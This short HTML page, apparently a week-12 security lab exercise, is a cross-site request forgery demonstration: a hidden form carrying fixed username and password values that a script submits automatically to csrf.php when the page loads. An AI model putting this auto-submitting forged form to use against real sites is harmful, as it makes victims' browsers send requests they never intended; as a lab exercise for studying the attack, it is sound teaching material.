<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="author" content="Benjamin Sarras">
	<title>LABwk12</title>
	
	<script>
		$(document).ready(function(){
			$("#csrf-form").submit();
		});
	</script>
</head>
<body>
	<form method="post" action="csrf.php" id="csrf-form">
		<input type="hidden" name="username" value="host" />
		<input type="hidden" name="password" value="pass" />
	</form>
</body>
</html>